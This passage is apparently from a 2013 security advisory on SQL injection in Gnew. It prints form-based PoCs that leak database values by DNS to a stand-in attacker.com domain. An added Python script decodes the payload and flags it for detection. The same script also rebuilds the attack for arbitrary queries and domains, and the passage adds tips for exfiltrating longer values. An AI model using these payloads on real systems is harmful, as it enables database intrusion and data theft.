The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under \".attacker.com\" (a domain whose authoritative DNS server is controlled by the attacker): \n<form action=\"http://[host]/posts/add.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add\" value=\"1\"> \n<input type=\"hidden\" name=\"preview\" value=\"1\"> \n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.8 The vulnerability exists due to insufficient filtering of the \"thread_id\" HTTP POST parameter passed to the \"/posts/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. \nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system. 
The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under \".attacker.com\" (a domain whose authoritative DNS server is controlled by the attacker): \n<form action=\"http://[host]/posts/edit.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"edit\" value=\"1\"> \n<input type=\"hidden\" name=\"preview_edited\" value=\"1\"> \n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \nSuccessful exploitation of vulnerabilities 2.3-2.8 requires that the attacker is registered and logged in. Registration is open by default. \n \nVulnerabilities 2.1, 2.2, 2.5 and 2.8 were discovered by Gjoko Krstic: http://packetstormsecurity.com/files/122771 on July 23, 2013. High-Tech Bridge Security Research Lab discovered these vulnerabilities independently and publishes them because they have remained unpatched since the vendor notification date.\n", "modified": "2013-10-02T00:00:00", "published": "2013-08-28T00:00:00", "id": "HTB23171", "href": "https://www.htbridge.com/advisory/HTB23171", "type": "htbridge", "title": "Multiple Vulnerabilities in Gnew", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/"}}]}
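The CHAR()-encoded argument list used by PoCs 2.3-2.8 of the Gnew advisory is hard to audit by eye. The Python script below is an added example, not code from the advisory, from High-Tech Bridge or from Gnew: it decodes that payload back into the UNC path MySQL would hand to load_file(), rebuilds an equivalent payload for any SQL expression and attacker-controlled domain, derives the host name the attacker's DNS server would see, and offers a check that flags such payloads during WAF rule writing or log review. The domain attacker.com and share name foobar come from the advisory; the sample version string 5.5.32 is assumed for illustration.

```python
import re

# Payload copied from the advisory's PoCs 2.3-2.8 (the injected POST value).
ADVISORY_PAYLOAD = (
    "' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),"
    "CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),"
    "CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),"
    "CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- "
)

# One token of a CONCAT() argument list: CHAR(n) or a scalar subquery such as
# (select version()).  Anything else (commas, closing parens) is skipped.
_TOKEN_RE = re.compile(
    r"CHAR\(\s*(\d+)\s*\)|\(\s*select\s+([^()]*\(\))\s*\)", re.IGNORECASE)


def decode_concat(payload: str) -> str:
    """Return the string MySQL's CONCAT() would build for this payload, with
    every scalar subquery kept as a <...> placeholder so the layout of the
    resulting UNC path stays visible."""
    start = payload.upper().index("CONCAT(") + len("CONCAT(")
    parts = []
    for m in _TOKEN_RE.finditer(payload, start):
        if m.group(1) is not None:
            parts.append(chr(int(m.group(1))))       # CHAR(n) -> one character
        else:
            parts.append("<" + m.group(2).strip() + ">")  # subquery placeholder
    return "".join(parts)


def char_encode(text: str) -> str:
    """Encode text as a comma-separated CHAR(n) list.  No quote characters are
    needed, which is why the advisory uses this inside a single-quote context."""
    return ",".join(f"CHAR({ord(c)})" for c in text)


def build_dns_exfil_payload(expr: str, domain: str, share: str = "foobar") -> str:
    """Rebuild the advisory's load_file(\\\\<expr>.<domain>\\<share>) payload for
    an arbitrary SQL expression and attacker-controlled domain."""
    args = ",".join([
        char_encode("\\\\"),                  # leading \\ of the UNC path
        f"(select {expr})",                   # value to exfiltrate, as a label
        char_encode("." + domain + "\\" + share),
    ])
    return f"' AND 1=(select load_file(CONCAT({args}))) -- "


def expected_query_name(decoded_path: str, value: str) -> str:
    """Host name the attacker's DNS server receives once the placeholder is
    replaced by the real value: the UNC host is everything between the two
    leading backslashes and the next backslash."""
    host = decoded_path.lstrip("\\").split("\\", 1)[0]
    return re.sub(r"<[^>]*>", value, host)


def is_unc_exfil(value: str) -> bool:
    """Detection check: a CONCAT() that decodes to a UNC path (\\\\host\\share)
    inside a request parameter is a strong DNS/SMB exfiltration indicator."""
    if "concat(" not in value.lower():
        return False
    decoded = decode_concat(value)
    return decoded.startswith("\\\\") and "\\" in decoded[2:]


if __name__ == "__main__":
    path = decode_concat(ADVISORY_PAYLOAD)
    print("decoded UNC path :", path)
    print("DNS query seen   :", expected_query_name(path, "5.5.32"))  # sample value, assumed
    print("flagged          :", is_unc_exfil(ADVISORY_PAYLOAD))
    print(build_dns_exfil_payload("user()", "attacker.com"))
```

Two practical caveats follow from the decoded path. The exfiltrated value becomes one DNS label, so it must consist of host name characters and be at most 63 bytes long; longer or binary values should be wrapped in HEX() and cut with SUBSTRING() across several queries. And load_file() returns NULL without touching the path unless the database account holds the FILE privilege, so the DNS query is only triggered on a Windows-hosted MySQL whose application account has that privilege.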